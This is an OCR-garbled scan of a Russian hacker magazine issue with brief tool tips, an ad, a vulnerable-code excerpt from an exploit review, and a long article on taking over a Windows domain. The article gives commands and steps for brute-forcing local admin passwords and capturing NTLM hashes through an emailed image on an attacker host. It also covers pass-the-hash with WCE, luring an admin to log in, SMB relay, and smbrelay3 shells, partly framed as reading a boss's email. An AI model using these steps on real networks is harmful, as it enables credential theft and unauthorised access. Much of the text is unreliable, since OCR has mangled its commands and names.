(БЗЕК=)) (СОММАЖ>=1од_бі1е) (АЕСБМЕБТЗ=4 ) (ЗЕЕѴІСЕ 
=ЫЗТЕБЕЕ) (ѴЕЕЗІОЫ=1) <ѴАШЕ=\\\\ір_зшЬ_ге1ау_ 
зегѵег\ ХзЬаге) ) ) " 



И через пару секунд мы получим администраторские права ксисте- 
ме. Если Огасіе стоит старый (8/9), то, возможно, операционка тоже 
старая, непропатченная, а потому релэй можно попытаться сделать 
на нее же. 

И самый важный момент- сервис 0 гасіе'а должен быть запущен с 
правами пользователя, а не под системой. Жаль, что такое бывает 
нечасто. 

Видео-пример можно посмотреть на ѵіплео.сот/5500931 . 



№7 



ЗАДАЧА: Отфильтровать отчеты Ыгпар 
в Іептар'е. 



Фильтруем результаты в 2ептар 



■ гіплвд 

Сн^ніфмынІ Ин’струілнгы ПрйфиАь Пйм&щь 
Цшгш 
Кошіці 



гмпьр -сѴ -РЫ -рІ-65515 -п -Т4 -сА . 



РЕШЕНИЕ: 

КІтар — вещица всем известная и многофункциональная. У нее есть 
несколько форматов для сохранения данных. Имхо, самые юзабель- 
ные — это ХМ І_ (параметр -оХ) и дптар (параметр -об). Последний — 
такназываемый дгерраЫе птар, подогнанный под классическую ути- 
литку дгер. При работе с крупными сетями возникаетнеобходимость 
быстро и четко делать выборки 
потем или иным параметрам. Но 
сдгер'ом оперативность нетак 
велика, особенно сучетом отсутс- 
твия под виндой такой команды. 

Потому для меня стало приятным 
знакомство с Хептар'ом. Для 
справки: Хептар- это офици- 
альный 01Л к N тару. Раньше я в 
нем вообще не видел смысла - в 
консоли все быстрее делается. 

Но с обработкой результатов 
он, конечно, помогает. Во- 
первых, Хептар умеет читать 
результаты скана вХМІ_-виде. 

Во-вторых, может работать сразу 
по нескольким отчетам в одном 
окне с объединением результа- 
тов. То есть, например, можно 
открыть скан портов всей сетки 
и скан какой-то ее части, но с 
определенными сервисами на 
портах. В результате хосты не 
дублируются, а информация по 
каждому порту берется из ХМ І_ с 
большим количеством данных. 

И, наконец, можно использовать 
фильтры. Внизу есть кнопка 
«Фильтр хостов». В ней можно 
задавать подсетку ІР-адресов 
для отображения. Командами 



вида «ор», «ір», «Фр» можно указать, что отображать нужно только 
открытые, отфильтрованные или неотфильтрованные порты соответс- 
твенно, а также задать конкретные порты для отображения. Командой 
«5:» можно поставить текстовый фильтр на сервисы (см. скриншот). 
Также прикольные вещи в Хептар'е - отображениетопологии сети и 
возможность сохранения профилей сканов. В общем, оченьсоветую 
попробовать. 

Из минусов стоит пожаловаться на лаговость ОШ - если количество 
хостов превышает 1 000, то прога тупит около секунды после каждого 
кл и ка . 
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ЗАДАЧА: Поиск строк при дебагге 
вОІІуОВО. 



РЕШЕНИЕ: 

В данной задаче имеется в виду динамический поискстрок.то есть не 
по виртуальной памяти, а в момент выполнения программы. Пред- 
положим, мы занимаемся реверсом какой-то проги и нам требуется 
установить выполнение программы, когда запускается функция со 
строковыми параметрами, введенными нами ранее. Или нужно найти 
функцию сравнения строк в процессе взламывания софтины. То есть, 
нас и нтересуеттот момент, когда либо в регистрах будетадрес ячейки 



нашей строчки, либо при вызове функции в параметрах будетнаша 
строка. Надеюсь, получилось внятно объяснить смысл задачи :). 
Описанная возможность отсутствует сред и стандартных возможнос- 
тей Олли. И большую часть дел приходится выполнять ручками. Зато у 
Олли есть плагины. 

Данная задача решается ОНуЗіерЫЗеагсІТем, который изначально 
написан Дидье Стивенсоном (Ыод.бібіегзіеѵепз.сот/ргодгатз/ 
оІІузІерпзеагсЬ). 

Плагин делаетто, чтоописано выше, а именно — построчно выпол- 
няет программу (по Р7) и проверяет, появилась ли ссылка на строку 
в регистрах или параметрахфункций. Проблем с использованием, 
думаю, не возникнет. Все просто. т 
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Повышение привилегий в домене ѴѴішІоѵѵз 

і Жажда власти издревле являлась движущей силой прогресса 
человечества. Любому из нас в той или иной степени присуща эта черта. 
Владеть недоступной другим или скрываемой ими информацией, и даже 
просто чувствовать, что это в твоих силах, хочет каждый. Поверь, сейчас 
это не так уж и сложно: достаточно подняться до администратора 
домена. 



Домены, домены... 

Что такое домен, знают все. Служба директорий, протокол 
доступа и еще куча различных сервисов. Информационная 
инфраструктура почти любой более-менее крупной организации 
держится на Ай. И в первую очередь Ай — это контроль доступа 
пользователей, а доменный админ — царь любого домена. 
Проводя тесты на проникновение, ты взаимодействуешь со сре- 
дой функционирования той или иной системы. Ты от нее зави- 
сишь, ты же на нее и влияешь. А в основе всего в подавляющем 
большинстве случаев лежит АО. Только представь, как расширя- 
ются глаза заказчиков и учащается их пульс, когда ты показыва- 
ешь вновь созданную учетную запись в группе доменных адми- 
нов. Демонстрация силы и возможностей рядовых сотрудников 
(инсайдеров) — одна из задач любого инфраструктурного пенте- 
ста. Поднялся до админа — готовь кошелек для премиальных. 
Недавно одна моя подруга, наслушавшись о моих подвигах, ска- 
зала, что ей тоже очень хотелось бы читать почту своей началь- 
ницы. Не знаю уж, зачем, просто очень хотелось. По ее мнению 
— это нереально или, по крайней мере, крайне сложно и ей тупо 
не под силу. Я же ответил, что это ни разу не так, и что достаточ- 



но будет пары часов, чтобы ее научить. Эта тема мне так понра- 
вилась, что я решил все систематизировать и нарисовать статью. 
Статью про 100%-ый убойный пентест. 

Итак, наша задача — получить права пользователя из группы 
доменных админов. Так как мы играем роль инсайдера, условим- 
ся, что у нас есть доменная учетка с ограниченными правами, а 
также возможность доступа к подключенной к домену машине с 
правами локального администратора. Согласен, что пользовате- 
лям далеко не всегда дают права локальных админов, но, тем не 
менее, не так уж и редко. И вообще, принципиального значения 
это не имеет, в заключительной части статьи я покажу, как их 
можно получить. Пока же для простоты будем считать, что такие 
права есть. 

Мы будем использовать общие подходы, не связанные с экс- 
плуатацией конкретных уязвимостей. Так что можешь пока забыть 
о своих любимых ехрІоіІ-бЬ и ѵиреп, а также о Сапѵаз и Соге 
ІтрасС Смело ставь фреймворк и чихай на антивирус — эксплой- 
ты нам все равно не понадобятся. А вот про Меіазріоіі забывать 
не стоит — там есть чудные модули и теіегргеіег в помощь. Ну 
что, поехали? 
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Локальный шелл с правами администрато- 
ра как результат рефлексии 



Старо, как мир 

Наверняка ты знаешь о том, что хэши локальных 
пользователей хранятся в реестре и могут легко быть 
получены при наличии админских привилегий. Не 
буду долго утомлять тебя избитыми вещами, бери 
саіп’а и снимай хэши. Если хранение І_М-хэшей не 
запрещено (надеюсь, тебе не семерку выделили), 
то подбор паролей не займет много времени. И уже 
через часик у тебя на руках будет пароль встроенной 
учетной записи локального администратора. 

С новыми окошками будет посложнее, так как І_М там 
уже не хранится, но и здесь, возможно, тебе повезет. 
Особенно, если у тебя в арсенале десяток машинок с 
нормальными видюхами. Ну а если и не повезет, тоже 
не расстраивайся — однако об этом чуть позже. 

Итак, пароль встроенной админской учетки получен. 
Зачем он нужен? Любой админ, по определению, ленив, 
и это нам на руку. В половине (если не больше) случаев 
этот пароль подойдет к куче других узлов. Это значит, 
что доступ ты и к этим машинам легко получишь. 

А если нет? Если политика запрещает использование 
одинаковых паролей на разных узлах, админы, как 
правило, придумывают некие паттерны, по которым 
и генерят пароли. Например, представим, что после 
подбора получено значение Абт391. Первое, что 
нужно сделать, это определить сам алгоритм гене- 
рации пароля. В данном случае похоже на то, что 
первая часть неизменна, а вторая — представляет 
собой некое трехзначное число. В лучшем случае ты 
поймешь, как оно формируется (например, последний 
октет ІР-адреса), в худшем — составь небольшой сло- 
варик со всеми возможными комбинациями. И вовсе 
необязательно делать это вручную — тебе поможет 
«Ваня-потрошитель». 

Копируем файл щбп.іпі в щбп.іпі.Ьак (на всякий слу- 
чай) и создаем новый файл следующего содержания: 

ІоИп.іпі 

[ЫзЦ . Киіез : Ѵ/огйіізЦ] 

$[0-9] 

$[0-9] $[0-9] 

$[0-9] $[0-9] $[0-9] 

Вдаваться в подробности синтаксиса правил — это не 
одну статью писать. Но общий смысл таков: для любо- 
го пароля из входного списка в конец будет добав- 
лено три элемента из множества {0,1 ,2, 3,4, 5, 6, 7, 8, 9}. 
После этого создаем входной файл с паролями. 



репІезІ.ѵѵогсНізІ 

А<±п 

Далее запускаем генерацию: 




.■ШІ "Е 




Чяіішвгіі 



Хэши последних входов в домен помогут определить 
пароли доменных пользователей 



3 оЕп-3 86 . ехе -ѵѵогс!1ізЦ=регШезЦ . ѵѵогсііізЦ 
-гиіез -зЬсІоиС > репЬезЬ . раззез 

На выходе получаем словарь с паролями для пере- 
бора. Для реализации брута я предпочитаю использо- 
вать олдскульную гидру: 



Р НТТР://ѴУѴѴѴ7 



> Ііпк$ 



Ъусіга -1 <имя_пользователя> -Р раззѵѵогсіз. 
ЬхЬ -ш Ь 192.168.120.11 зшЬпЬ 

Не забывай поставить литеру І_, чтобы указать 
гидре проверять локальные, а не доменные учетные 
данные. В качестве имени пользователя использу- 
ем то же, которое было обнаружено на локальной 
машине. На русской винде, если админы не насле- 
дили в групповых политиках, это «Администратор». 
Однако не спеши и вспомни о кодировках. Вместо 
«Администратора» придется подставлять загадочную 
строчку « а-Ё-Ёбва в®а». Запускаем и ждем резуль- 
татов. Кстати, замечу, что гидра отлично работает в 
несколько потоков, так что можешь хоть всю сетку 
зараз брутить. 

Наследили... 



• Из описания 
алгоритма 
формирования 
І_М-хэша становятся 
очевидными все 
его слабости: 
еп.ѵѵікіресііа.ога/ѵѵікі/ 
1_М базб ; 

• Кэширование 
доменных входов в 
ОС ѴѴі псіоѵѵз : зир- 
рогЕптсгозоЛ.сот/ 
кЬ/91 3485 : 

• Страничка роке- 
ЬазЫэа[[: дгиЩфп- 
доіапдо.пеі/ехріоііз/ 
рокебазбЬа[[.Ы:ппІ ; 



Ну и что? Ну, набрутили локальных админов... При чем 
здесь домен-то? Согласен, не забываем про конечную 
цель и двигаемся дальше. 

Наверняка ты не раз замечал, что, выдрав рабочий 
ноут из сети и поехав погреться, ты в любой момент 
можешь залогиниться со своей доменной учеткой. 
Зададимся вопросом: как же это, домен ведь недо- 
ступен? Ответ крайне прост. Как раз для таких целей 
Винда хранит кэшированные пароли последних 
доменных входов. 

Чудо это называется СасбесІ йотат Сгесіепііаіз. На 
самом деле, это совсем не хэши, и ничего обще- 
го со знакомыми тебе ЕМ или ІМИМ они не имеют. 
Поэтому и толку от них никакого, пока ты их не про- 
брутишь. Количество хранимых хэшей определяется 
значением параметра СасбесНодопБСоипі раздела 
реестра Н КЕУ_ЮСАЕ_М АС Н I N Е\5о Лѵѵа ге\М ісгозоЛ\ 
ѴѴіпсІоѵѵз І\ІТ\СиггепІ Ѵегзіоп\ѴѴіп[одоп. По умолчанию 
все версии Винды хранят хэши десяти последних 
входов. Логично, что среди этих хэшей наверняка 
встретятся и хэши админа. Снимать эти хэши умеют 
многие тулзы, включая Саіп и РѴѴОиппрХ. Первым 
удобно пользоваться на локальной машине, второй 
же ты можешь юзать для удаленной работы. Запускай 



• Свежая и, 
наверное, лучшая 
тулза для реализации 
раззЛНе-НазН: багк- 
пеСогд.ик/2010/10/ 
ѵѵі псіоѵѵз- с гесІепЦаІз- 
есІі[ог-ѵ1 -О-ІізІ-асІсІ- 
есііі-іодоп-зеззіопз : 

• Слабенькая 
попытка МісгозоЛ 
прикрыть 5МВ Ве[ау: 
тісгозоИсотДесб- 
пеі/зеси гіІу/Ьи Иеіі п/ 
тз08-068.тзрх : 

• Обзор 5МВ зідпіпд: 
зиррогЕтісгозоЕ. 
сот/кЬ/887429 : 

• 5тЬВе[ауЗ 
позволит получить 
права локального 
администратора 
системы: Ыагазсо. 
огд/зесигіІіу/зтЬгеІау . 
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Запускаем новую сессию с использованием хэшей Не надо было бы админу «письмо счастья» открывать 



доменного админа 



Саіп’а, переходи на вкладку Сгаскег и выбери в левой панельке 
М5-СасЬе Назбез. Далее все, как обычно. Если тебе повезло 
набрутить админов на других узлах, не поленись и сними хэши с 
этих машин. 

Надеюсь, удача тебя не оставит, хотя шансов, честно скажу, 
немного. Во всех доменах, которые мне попадались, были 
настроены политики сложности пароля. Более того, админы для 
себя, как правило, выбирают действительно сложные пароли, 
так что в большинстве случаев тебя ждет провал. Помочь тебе 
может Ехігете ѲРІІ Вгиіеіогсег, который осуществляет перебор 
на видюхах, однако гарантий, сам понимаешь, никаких. А раз нет 
гарантий — это не по-нашему, и мы идем дальше. 

Письма счастья 

Могу поспорить, что на работе ты почти каждый день полу- 
чаешь письма, повествующие об отключении холодильника, 
корпоративных пьянках и принятии на службу новых бойцов. 
Примечательно, что эти письма никогда не попадают в спам, при 
этом картинки в них автоматически подгружаются и отображают- 
ся почтовиком. 

Если копнуть чуть глубже, можно обнаружить, что для отображе- 
ния письма в НТМІ_ Оиііоок использует движок ІЕ. Парадигма 
безопасности ІЕ зиждется на разделении всех ресурсов на зоны. 
В зависимости оттого, к какой зоне отнесен ресурс, определя- 
ется и уровень доверия к нему. Для ресурсов, входящих в тот же 
домен, что и ты, назначается зона «Интранет». В этой зоне ІЕ (а 
значит, и Оиііоок) при необходимости производит автоматиче- 
скую авторизацию с текущими учетными данными на ѵѵеЬ-узле. 
Отсюда рождается следующий сценарий атаки. Делаем рассылку 
письма, содержащего ссылку на картинку, расположенную на 
контролируемом нами узле. А на самом узле поднимаем фейко- 
вый ѵѵеЬ-сервер, задачей которого будет являться принуждение к 
авторизации и запись сессии аутентификации. 

Роль такого сервера поможет сыграть утилита рокеЬазЬЬаІІ. 

Тулза написана на РиЬу и использует библиотеки Меіазріоіі. Так 
что, если еще не поставил, быстро устанавливай Меіазріоіі и 
пропиши путь к библиотекам в переменную среды РІ)ВѴІ_ІВ=С:\ 
Ігатеѵѵогк\т5ІЗ\ІіЬ. 

Для отправки письма используй Оиііоок Ехргезз. Дело в том, что 
взрослый Оиііоок при отсылке сам забирает картинку и вставля- 
ет ее в письмо; нам же подойдет только ссылка. Как настроить 
Оиііоок Ехргезз ты, думаю, разберешься. Настроил? Тогда создай 
НТМІ_-файл следующего содержания: 

Наскег,<Ьг />тОгО СогрогаЬіоп <ітд ѵ7ІсШ1і=1 ЬеідЫ: = 1 
згс= "ЬЦЦр : //Іатегсотр : 8088 /сі.діТ" /> 

Далее в Оиііоок выбери меню «Сервис -> Параметры», а затем 
на вкладке «Подписи» создай новую подпись, указав в качестве 
источника созданный файл. 



Все готово! На узле Іатегсотр запускаем рокеЬазЬЬаІІ. 
Придумываем себе очередной день рождения и делаем рассылку 
с приглашением поучаствовать всем желающим, особенно адми- 
нам. При этом в конце письма не забываем добавить зловещую 
подпись. После нажатия кнопки <5епсІ> можно пойти погулять 
и через пару минут вернуться за уловом. Результаты увидишь в 
выдаче рокеЬазЬЬаІІ. 

Выход кардинально зависит от настроек групповых политик. В 
идеале это будет І\ІТІ_М-аутентификация с І_М-хэшами. Если так — 
тебе повезло. На нормальном ноуте ты пассы за один день желез- 
но подберешь (если, конечно, админы непечатаемые символы не 
используют). Ну а в худшем — І\ІТІ_Мѵ2-аутентификация, под кото- 
рую, в силу особенностей алгоритма, даже радужных таблиц нет. 
Здесь можно рассчитывать только на удачу и отсутствие парольных 
политик. Да, и не забудь отменить ДР после удачного брута. 

Скажу тебе по секрету: статистика моей практики пентестов пока- 
зывает, что этот метод в 100% случаев дает желаемый результат. 
Его основными преимуществами являются массовость и незамет- 
ность. Рассылка по списку сразу же подсаживает кучу пользова- 
телей, а факт наличия доверенных отношений приводит к тому, 
что пользователю не выдается никаких запросов: для него все 
полностью прозрачно и, что самое прекрасное, от него ничего не 
зависит! 

Чужие пальчики 

Тем не менее, предположим, что пока все усилия пропали даром. 
Ни один из перехваченных хэшей пробрутить не удалось. Но не 
будем отчаиваться, а пошевелим извилинами. Одной из целей 
использования внешних каталогов является реализация пара- 
дигмы Зіпдіе 8ідп-0п. Залогинившись на комп, ты получаешь 
доступ ко многим сервисам, больше не вводя никаких паролей. 

Во всяком случае, к сервисам Місгозоіі. Никто тебя лишний раз 
не беспокоит, когда ты цепляешься к корпоративному почтовику, 
СРМ или системе внутреннего документооборота. Это значит, что 
пока твоя сессия активна, твои учетные данные хранятся в памя- 
ти и используются автоматически. 

Пароли, естественно, в открытом виде не хранятся — хранятся их 
хэши, уже нам знакомые І_М или І\ІТІ_М. Ну а теперь главное: если 
Винде достаточно только хэшей, чтобы тебя авторизовать, значит 
и тебе для авторизации под чужой учеткой сам пароль не нужен, 
а нужен только его хэш. Технология авторизации по хэшу носит 
название разз-іЬе-ЬазЬ. Получается, что никакая там парольная 
политика и отсутствие вычислительных мощностей нам не поме- 
ха. Мы просто ничего не будем брутить. Проблема заключается в 
том, как эти самые хэши получить. 

Заметь, ничего нового я не сказал, а утилит, которые позволяют 
получать хэши из активных сессий, не так уж и мало. Мне боль- 
ше всего по душе утилита ѵѵсе, которая может не только снимать 
хэши, но и использовать их для инициации новых сессий с 
использованием сдампленных хэшей. 
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Пароль локального админа подобрать не 
проблема 



Для дампа сессий просто запусти бинарник. 
Естественно, кроме своей учетки ты ничего не уви- 
дишь. Для компрометации админа нужно запустить 
утилку на узле, на котором админ в настоящее время 
залогинен. В этой связи наибольший для нас интерес 
представляют сервера. Если тебе удалось получить 
локальный админский доступ к серверу, забрось туда 
бинарник и запусти: 

ѵгсе.ехе -гбО -о с : \Цетр\ѵгсе . Іод 

Опция — гбО заставляет тулзу проверять наличие новых 
логинов каждые 60 секунд. При запуске можешь 
получить отлуп в виде ошибки инжектирования в 
процесс І_5А55. Тогда попробуй запуститься с права- 
ми ЕосаІЭузІет. Для этого ты можешь использовать 
планировщик или воспользоваться утилитой рзехес с 
ключом -5. Ну а дальше — вопрос времени и везения. 
Нужно просто дождаться, пока админ подключится 
к серверу. Чем больше серваков — тем лучше. Для 
ускорения этого процесса можешь применить свой, не 
сомневаюсь, незаурядный талант в области социаль- 
ной инженерии. 

Если тебе не повезло, и к сервакам доступа ты 
не имеешь, придется пожертвовать своей тачкой. 
Главное — помнить, что в клиентских ОС от МісгозоЙ 
одновременно возможна только одна активная сес- 
сия. Причем для тачек, включенных в домен, интерак- 
тивный доступ отключается. Это означает, что когда 
админ к тебе подконнектится, все твои задачки, в том 
числе и ѵѵсе, будут завершены. То есть нужно немнож- 
ко постараться и сделать так, чтобы твоя задача либо 
всегда висела, либо запускалась при каждом входе. 
Для того, чтобы задача не завершалась, ее можно 
запустить либо от имени ЕосаІЭузІет (с помощью 
того же планировщика), либо в виде сервиса. Однако 
лично у меня такие эксперименты окончились неудач- 
но. Процесс работает, но в файл ничего не пишет. 
Поэтому предлагаю альтернативный путь. Для этого 
создадим простой скриптик следующего содержания: 

ѵѵсе.ЬаІ 

@есЕю 

с : \Цетр\ѵгсе . ехе -о с:\ѵ\гсе.1од 

Далее добавляем его в автозагрузку. Ключей и 
методов автозагрузки множество — выбор за тобой. 
Простейшим вариантом является создание соот- 
ветствующего параметра в разделе реестра НКЕѴ_ 
І_ОСАІ__МАСН I N Е\5об1:\л/а ге\М ісго5об1:\ѴѴі псІо\л/з\Си ггепі: 
Ѵегзіоп\Рип. После этого позвони админу и сообщи 
ему, что у тебя комп вообще не работает и очень сроч- 
но нужна его помощь. Когда он придет, залогинится 
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Не используй одинаковые или похожие пароли на разных узлах 



и скажет, что все ОК, не забудь восхититься его про- 
фессионализмом, тысячу раз извиниться и пообещать 
ящик пива. Ну а когда уйдет, посмотри содержимое 
файлика сЛѵѵсе.Іод. А еще лучше — запусти команду 

ѵгсе -з сто, что в файлике лежит> -с стсі 




и наслаждайся консолью с правами администратора 
домена. 

Отражение 

Все замечательно, но, как и всегда, хочется процесс 
несколько автоматизировать. Напрямую использовать 
хэши, полученные при сниффинге аутентификацион- 
ных сессий, нельзя, потому что это не в чистом виде 
ЕМ- и ИНМ-хэши, а некоторые криптографические 
преобразования над ними с использованием случай- 
ных значений. Тем не менее, если полностью повто- 
рить процесс аутентификации, в правильном порядке 
манипулируя значениями сбаііепде, есть возможность 
авторизоваться с получаемыми хэшами. Эта методика 
носит название 5МВ Реіау. 

Метод не новый и МісгозоіУ о нем известно. Не так 
давно (вспомни, когда появилась І\ІТ) наконец-то поя- 
вился бюллетень М508-068. Соответствующие апдей- 
ты перекрывают возможность осуществлять рефлек- 
сию на хост, инициировавший соединение. Однако 
это вовсе не исключает возможности рефлексии на 
другие хосты или по другим протоколам. 

Одним из действенных механизмов защи- 
ты является «подписывание 5МВ». Настройка 
осуществляется либо групповыми политика- 
ми, либо путем редактирования параметров 
ЕпаЫеЭесигіІуЭідпаІиге и РедиігеЭесигіІуЭідпаІиге 
раздела НКЕУ_Е0САЕ_МАСН1ЫЕ\5У5ТЕМ\ 
СиггепіСопІго15еі\5егѵісез\ЕапМапВегѵег\ 
Рагатеіегз. Стоит отметить, что начиная с 
ѴѴіпсІоѵѵз 2000 РедиігеЭесигіІуЭідпаІиге включен 
на контроллерах домена по умолчанию, обламывая 
все попытки рефлексии на контроллер. Однако с 
клиентскими осями полный порядок. 

Для реализации рефлексии будем использовать 
модуль зтЬ_геІау великого и ужасного МеІазрІоіКа. 
Итак, запускаем консоль, выбираем и настраиваем 
модуль зплЬ_ге1ау: 



> іпіо 

Как использовать 
все, что описано в 
статье, решаешь ты 
сам. Но советую не 
искушать судьбу. Не 
забывай получать 
письменное согласие 
заказчика на все 
свои действия. 




> сіѵсі 

Весь необходимый 
софт, а также 
видеоролик ты 
найдешь на диске, 
прилагаемом к 
журналу. 



изе ™іп<іомз/зтЪ/зтЪ_ге1ау 

зеЬ зтЫтозЬ <ір-адрес для рефлексии> 

ехріоіь 
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Рефлексия в действии 



Не запустился? Не спеши расстраиваться. Правильно, что экс- 
плойт не запустился, так как порт 445 забинден виндой за 5МВ- 
службой. Многие пугаются того, что службу стандартными сред- 
ствами убить нельзя, однако это не так. Запускаем гедебіі и при- 
сваиваем параметру ТгапзрогіВіпбЫаппе раздела НКЕѴ_І_0САІ__ 
МАСНІМЕ\5Ѵ5ТЕМ\СиггепіСопІго15еі\5егѵісез\І\ІеіВТ\РагаппеІег5 
пустое значение. После этого перезагружаемся и пробуем заново. 
Теперь все отлично! Каким-либо образом заставляем админа 
подключить любой ресурс на нашем компе и, как только он это 
сделает, у тебя на руках будет ппеіегргеіег на том хосте, на кото- 
рый ты рефлексился. А куда же рефлекситься, спросишь ты? Если 
нельзя на тот же узел и на контроллер домена, куда тогда? Есть 
очень красивый вариант — рефлекситься на тачку другого адми- 
на. Как в боевиках: все админы друг друга постреляли. Что даль- 
ше ты будешь делать с теіегргеіег — уже не моего ума дело. 

Неір, I пеесі зотеЬосІу 

На десерт — самое вкусное. До этого мы считали, что имеем 
права локального администратора. Что делать, если их нет? 
Замечу, что отправка писем счастья не требует никаких дополни- 
тельных прав. Так что этот метод можно использовать и из-под 
ограниченной учетной записи. В принципе, ничто не мешает и 
Меіазріоіі загрузить, однако освободить 445 порт без админских 
прав, к сожалению, не получится. Так как метод со сниффингом 
сессии аутентификации требует брута хэшей и не гарантирует 
результата, надо придумать что-то более солидное. 

Как я уже говорил, рефлексия может быть произведена и с других 
протоколов, в том числе и в результате аутентификации на НТТР- 
сервере. Таким образом можно поднять собственный ѵѵеЬ-сервак 
на непривилегированном порту и заслать «письмо счастья» со 
ссылкой на этот сервер. А рефлексию с правами админа про- 
водить на БМВ, скажем, на свой же узел. В результате получим 
шелл с админскими правами на своей машине. Сказано — сдела- 
но, да не тут-то было. К сожалению, Меіазріоіі’овский зтЬ_геІау 
жестоко обламывает, работая только с БМВ. 

Но здесь на помощь приходит другая тулза под названием 



зтбгеІауЗ. Она умеет делать ровным счетом то, что нам и надо. 
Итак, запускаем: 

зшЬгеІауЗ . ехе --ЫзСРогНТТРКедиезСз 
--АШегпаСіѵеЗгсРогЦ 8088 --ЗМВБезШпаЫопНозР 
< 1 атегсотр> 

После этого не забываем про письмо с нужной ссылкой на кар- 
тинку в подписи и медитируем на консоль. Как только увидишь 
строчку 

[ + ] *** КешоРе ЗтЬКеІауЗ ВіпсЗЗЦеІІ Зегѵісе Киппіпд 

***: (<твой ІР>: 8080 ), 

сразу запускай телнет и подключайся к порту 8080. Дальше дело 
техники и пеі изегтебе в помощь. 

Качество гарантирую 

Получая задание на инфраструктурный пентест и спрашивая, что 
же заказчик хотел бы в конце этого действа увидеть, я в 9 случа- 
ях из 10 слышу ответ: «А вот попробуйте получить доступ к почте 
нашего зама по безопасности!». Ну что ж, можешь смело браться 
за такие пентесты — результат гарантирован. 

Реализуя один из описанных сценариев, ты, так или иначе, 
непременно получишь права доменного админа. Имея права 
доменного админа, ты можешь снять хэши со всего каталога. А с 
помощью разз-ібе-базб получишь доступ к почте не только зама 
по безопасности, но и любого другого сотрудника. Вообще гово- 
ря, реализация полученных возможностей может быть ограниче- 
на только твоей фантазией. 

Напоследок скажу, что на Місгозоіі я не работаю, и денег мне не 
платят, чтобы за них думать. Никаких рекомендаций от меня ты 
не услышишь: их разработка пусть будет твоей головной болью, 
когда будешь отчитываться по результатам своего следующего 
убойного пентеста. Возможно, это будет темой твоей следующей 
статьи в ][. цс 
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СОВМЕСТИ ПРИЯТНОЕ 
С ПРИЯТНЫМ 



Купите смартфон в салоне-магазине МТС 
и получите месяц бесплатного Интернета 
с телефона 



на шаг впереди 



мегму 



ідка 100% на^бонентсную плату на услугу «Безлимитный Интернет с телефона» сроком на 1 месяц. Со 2-го месяца абонентская плата за услугу 
З.^к^дка предоставляется новым пользователям услуги «Безлимитный Интернет с телефона». Сроки проведения акции: с 28.02.2011 года 
ги в салонах-магазинах МТС. 
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ОБЗОР . 

ЭКСПЛОИТОВ 

Конец декабря и начало нового года для компании МісгозоН 
выдались несладкими: уязвимость в ядре ѴѴіпсІоѵѵз (ЕпаЫеЕІШС), 
о которой уже было написано в прошлом выпуске, так и не 
запатчена, плюс к ней добавилась целая пачка свежих нульдеев, 
о которых я спешу рассказать в этом обзоре. 




Итак, вот краткий таймлайн выхода в свет информации об уязви- 
мостях: 

• 21 -го декабря публикуется РоС, который валит РТР-сервис, вхо- 
дящий в пакет N5 7.5; 

• 22-го декабря на китайском хакерском сайте ѵѵооуип.огд публи- 
куется информация об уязвимости в АсІіѵеХ'е ѴѴМІ Абтіпізігаііѵе 
ТООІБ; 

• 27-го декабря известный хакер Андреа Микалицци, более извес- 
тный как гдосі, публикует краткий анализ уязвимости и РоС для Рах 
Соѵег Раде Есіііог; 

• 4-го января Джошуа Драй к добавляет эксплойт в теіазріоіі для 
очень интересной уязвимости в обработке эскизов, до этого в дека- 
бре Моти и КсуХао посвятили целое выступление этой архитектур- 
ной уязвимости на азиатской конференции РОС 201 0; 

• 5-го января сотрудник компании Ѳоодіе Михал Залевски публи- 
кует информацию о баге в Іпіегпеі Ехріогег'е. 

Интересно почитать блог мелкомягких Зесигііу РезеагсЬ & 
йеіюпзе, в котором они часто публикуют информацию о минимиза- 
ции рисков — например, ѴѴогкагоипсІ для защиты отуязвимости в 
обработке эскизов (СѴЕ-201 0-3970) путем применения АСІ_-листов 
для уязвимой библиотеки зЫппдѵѵѵ.сіи. 

Также МісгозоІТ стараются приуменьшить рискуязвимостей, 
ставя на некоторых ярлык йо5 о п Іу, что иногда двигает хакеров 
к новым техникам обхода современных защит. Яр кий пример 

— уязвимость в ЕТР(СѴЕ-201 0-3972): эксперты из М5 счита- 
ют, что переполнение, при котором мы затираем метаданные 
константой(ОхЕЕ в данной случае), без контроля над адресами 
перезаписи не эксплуатабельно! Но двум реверсам в команде 

— Крису Валазеку и Риану Смиту — удалось выжать максимум, 
получить контроль над ЕІР. 

Однако «вторник патчей» не поразил большим количеством 
бюллетеней — всего два, закрывающие три уязвимости. Одна из 
которых (Іпзесиге ЫЬгагу І_оасІіпд в Васкир Мападеге'е) уже стала 
банальностью, причем уязвимости подвержена только Ѵізіа. 
Второй бюллетень исправляет сразу две уязвимости в МРАС, 
одна из которых довольно интересна и даже использовалась на 
хакерском турнире Р\л/п20ѵѵп. С нее и начнем обзор. 
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УДАЛЕННОЕ ИСПОЛНЕНИЕ 
КОДА В МІСВ050РТ РАТА АССЕ55 
>МР< 



СОМРОЫЕМТ5 



ѵѵіпсіоѵѵз ХР, 2003, Ѵізіа, 2008, 7 



Е2Е5 

Уязвимость класса Іпіедег Оѵегбіоѵѵ, которая, в свою очередь, ведет 
кпереполнениюбеар'аи связана с обработкой свойства СасбеЗіге 
АсІіѵеХ компонента М5А00. 

Свойство СасбеЗіге объекта РесогсІЗеІ целочисленного типа 
отвечает за количество записей, которые будут храниться в кэше 
набора данных. Внутренне СасбеЗіге используется при расчете 
памяти, выделяемой для хранения этой информации, что делается 
путем умножения на 4, так как в кэше хранятся лишь идентификато- 
ры записей ОѴѴОРВ — 4 байта: 

Уязвимый код в твасІо.сШ 

. СехБ : 4ВБРС348 Іеа еах, сіз:4[еах*4] 

; еах — значение СасІіеЗіге 
. СехБ : 4ББРС34Р ризіі еах 

. ВехВ : 4ББРС350 ризіі ОАОООООЪ 

. БехБ : 4ББРСЗ 55 ризіі 7д_1іНеарНап(і1е@@ЗРАХА 

; ѵоісі * д_ШеарНапс11е 

. БехБ : 4ББРС3 5В саіі сіз : ітр МрНеарАІІос 

; Выделяем память 

Как видишь, напрочь отсутствует проверка ситуации, когда 
СасбеЗіге будет больше 0x40000000, что приведет к целочислен - 
но му переполнению, а значит — будет создан буфер некорректной 
длины, а затем переполнение и затирание памяти. 

Теперь дело за тактикой. Во-первых, к какой базе данных будем 
делать запросы? Тут нам на помощь придет технология ХМІ_ Оаіа 
Ізіапсі, которая заключается в том, что с помошью ХМІ_, внедренно- 
го в Ыті- страницу, мы эмулируем базу данных: 
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0x21212121 — хорошее значение для регистра ЕІР :) 



Строение памяти для осуществления техники 



Пример внедренной базы данных 

<?хш1 ѵегзіоп= " 1 . О " епсос!іпд= "и^^-8 " зСапс1а1опе= "уез " ?> 
